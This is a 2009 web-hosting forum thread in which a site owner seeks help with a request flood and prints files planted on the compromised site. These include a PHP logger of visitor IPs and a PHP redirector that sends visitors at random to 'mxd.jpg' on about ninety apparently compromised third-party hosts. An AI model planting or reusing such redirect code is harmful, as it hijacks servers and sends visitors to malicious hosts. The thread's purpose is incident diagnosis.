Results 1 to 3 of 3
Thread: Strange http query attack
-
04-09-2009, 03:30 AM #1Newbie
- Join Date
- Apr 2008
- Location
- San Telmo, Buenos Aires
- Posts
- 12
Strange http query attack
Hello, I have a problem since yesterday in one of my servers, Im receiving between 200 and 300 hits by second from different IPs to a non existent path in a site, the hits are going to different cracks, films and download query's, this site is a directory and its not a warez or p2p site.
The site is onemilliondirectory.com, and I have suspended it because it was using a lot of resources of the first server, now its being redirected to other location, I have placed some traffic trackers to determine the referer or any other usefull info about the visitors, but the referer is always empty and I think that they are fake users because the statcounter tracker do not recognize the visits.
For example, some of the hits are:
Code:GET /suspended.page/?v=ABC%204%20KIDS%20Workshop%201.0.zip HTTP GET /suspended.page/?v=DecryptSQL%202.8.zip HTTP/1.1 GET /suspended.page/?v=[0]%20Msn%20Live%20Messenger%20Mobile.zip GET /inactive.html?v=Able%20Photo%20Slide%20Show%202.2.5.5.zip GET /suspended.page/?v=English%20Grammar%20Worksheet%201.4.zip GET /inactive.html?v=Karaoke%205%2030.zip HTTP/1.1 GET /suspended.page/?v=Nero%208%208.3.2.1.zip HTTP/1.1
Code:Host: 82.246.88.241 /inactive.html?a=Knowing.2009.TS.FRENCH.XVID-PaGlop.****.[emule-island.com].avi Http Code: 200 Date: Apr 07 16:39:54 Http Version: HTTP/1.1 Size in Bytes: 262 Referer: - Agent: Internet Explorer
PD:I was checking the stats of the site and I have seen as a referer of one of the visits this url: blackhatbootcamp.com /affiliates.html, Im not sure if it has any relation with the problem.
Thanks in advance
Daniel
-
04-09-2009, 10:46 AM #2Newbie
- Join Date
- Apr 2009
- Posts
- 13
Hi,
Use the below command to find any IP making huge no of http connections to your server.
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
If you want to block it automatically, you may install ddos_deflate
http://deflate.medialayer.com/
Regards,
we3cares tech
-
04-09-2009, 01:56 PM #3Newbie
- Join Date
- Apr 2008
- Location
- San Telmo, Buenos Aires
- Posts
- 12
Hi, Thanks for your reply. I have used the command but there are no IPs using a huge number of connections, the most are using 1 or 2 connections.
I have checked the folder structure of the site, and I have found that there are a new folder created called "1", and files with the names "logi.php", "log2.php", "ffs2.php", "4556.txt", "file_names.txt", "mxd.php", "down_log.txt", "emlog.txt", "f6fs.txt" and "servernames2.php".
The most of the files are empty, the file "file_names.txt" has a list of more than 11.000 records like:
Code:Kana Clip 1.1.2.10.czip ProStat 4.11.czip Stellar Phoenix Solaris-Sparc 1.0.czip YupooStream 1.0.10.czip erb - Empty Recycle Bin 1.6.2.czip
Code:<? if (isset($_GET["a"])) { $fp = fopen("down_log.txt", "a"); if ($fp) { fwrite($fp, $_SERVER['REMOTE_ADDR']." | ".$_GET["a"]."\n"); fclose($fp); } } ?>
Code:<?php // сюда вбиваются все линки, на один из них случайно производится переадресация $hosts = array("http://ad.diapositivas.com/mxd.jpg", "http://ad.videoenlaces.com/mxd.jpg", "http://addressdev.com/mxd.jpg", "http://adndiario.com.ar/mxd.jpg", "http://affairedunet.com/mxd.jpg", "http://aisanti.com/mxd.jpg", "http://aislesofgreen.com/mxd.jpg", "http://ajholweg.nl/mxd.jpg", "http://anpopobbs.com/mxd.jpg", "http://anunciosgo.com.br/mxd.jpg", "http://artesecia.com/mxd.jpg", "http://azehntner.ch/mxd.jpg", "http://bardomineiro.com.br/mxd.jpg", "http://borkum.rotary1850.org/mxd.jpg", "http://carmendardalla.com/mxd.jpg", "http://cartavalurbana.com/mxd.jpg", "http://cefaleaemicrania.it/mxd.jpg", "http://centrojuma.es/mxd.jpg", "http://ciafer.com.br/mxd.jpg", "http://cifras.be/mxd.jpg", "http://clubtaurinoperalta.com/mxd.jpg", "http://coachrunning.be/mxd.jpg", "http://contactoangelico.com/mxd.jpg", "http://dedidm.agoride.com/mxd.jpg", "http://delcarnes.com.br/mxd.jpg", "http://dts-developpement.fr/mxd.jpg", "http://dunas.com.br/mxd.jpg", "http://electrovision-lacasa.com/mxd.jpg", "http://ellipseimage.com/mxd.jpg", "http://entdeveze.com/mxd.jpg", "http://equipoloemi.com/mxd.jpg", "http://faracemichele.com/mxd.jpg", "http://fengshuiar.com/mxd.jpg", "http://fotografiaspastor.com.br/mxd.jpg", "http://francobonaventura.net/mxd.jpg", "http://freshontime.ro/mxd.jpg", "http://gabrielasouto.com.br/mxd.jpg", "http://gcisl.com/mxd.jpg", "http://harmsen-degroot.nl/mxd.jpg", "http://hotelarbus.it/mxd.jpg", "http://hotelcapri.com.br/mxd.jpg", "http://jsahagung.110mb.com/mxd.jpg", "http://keystonesupplements.com/mxd.jpg", "http://kunstfoto-engel.com/mxd.jpg", "http://madurasputas.webspacemania.com/mxd.jpg", "http://maik.fgru.de/mxd.jpg", "http://masterbkr.com.br/mxd.jpg", "http://mespremierespartitions.fr/mxd.jpg", "http://myhomestore.biz/mxd.jpg", "http://paintballgalicia.com/mxd.jpg", "http://peartreevideo.com/mxd.jpg", "http://porntopia.oxyhost.com/mxd.jpg", "http://puchuni.com/mxd.jpg", "http://putitas.uni.cc/mxd.jpg", "http://quiromasajista.net/mxd.jpg", "http://rapidlabs.de/mxd.jpg", "http://ravestsoft.cl/mxd.jpg", "http://residencelucienpaye.fr/mxd.jpg", "http://s196859181.online.de/mxd.jpg", "http://s92091163.onlinehome.us/mxd.jpg", "http://shiatsu-mingmen.com/mxd.jpg", "http://songinnight.nayana.com/mxd.jpg", "http://soulens.com/mxd.jpg", "http://suoninversi.com/mxd.jpg", "http://tabuladas.com/mxd.jpg", "http://telefuglehund.org/mxd.jpg", "http://tinytelly.co.kr/mxd.jpg", "http://tsua.net/mxd.jpg", "http://villageostia.com/mxd.jpg", "http://vinabric.si/mxd.jpg", "http://web798.webbox180.server-home.org/mxd.jpg", "http://wtal-city.de/mxd.jpg", "http://www.aecisrl.com/mxd.jpg", "http://www.agriturismoilmandorlo.it/mxd.jpg", "http://www.aozora.co.kr/mxd.jpg", "http://www.appliteam.com/mxd.jpg", "http://www.bookmat.com/mxd.jpg", "http://www.bricomatica.net/mxd.jpg", "http://www.camel-schmuck.com/mxd.jpg", "http://www.dentalclubmercedescova.com/mxd.jpg", "http://www.harpadedavi.com/mxd.jpg", "http://www.joyhotels.com.br/mxd.jpg", "http://www.ktg.hg.pl/mxd.jpg", "http://www.nancycroes.com/mxd.jpg", "http://www.strcolatina.com.br/mxd.jpg", "http://www.superfrozentuna.eu/mxd.jpg", "http://yachtpoint.at/mxd.jpg", "http://yorukconstruction.com/mxd.jpg", "http://zenessens.fr/mxd.jpg"); header("Location: ".$hosts[rand(0, sizeof($hosts)-1)]); ?>
Code:89.159.243.18 | Fantasy.All.Stars.3.XXX.DVDRip.MPEG1.CD2.mpg 83.194.212.246 | American.Girls.French.Dvdrip.Divx.par.[emule-island.com].avi 89.159.243.18 | [Wii]Mario_Kart[PAL][ISO-Full].rar 83.194.212.246 | American.Girls.French.Dvdrip.Divx.par.[emule-island.com].avi 201.86.66.44 | Steinberg.Cubase.SX.v3.0.2.623-H2O.rar
Code:121.134.40.68:4661 83.233.165.234:4819 83.233.30.103:4500 72.172.89.125:4661 89.248.172.54:4500
I have deleted this files in the old server, changed the DNS records of the site and create it again in a new server, but if I active it, the server just collapse, in a few seconds the CPU use is 100% and the unique way to fix it is restart and suspend the site again.
Thanks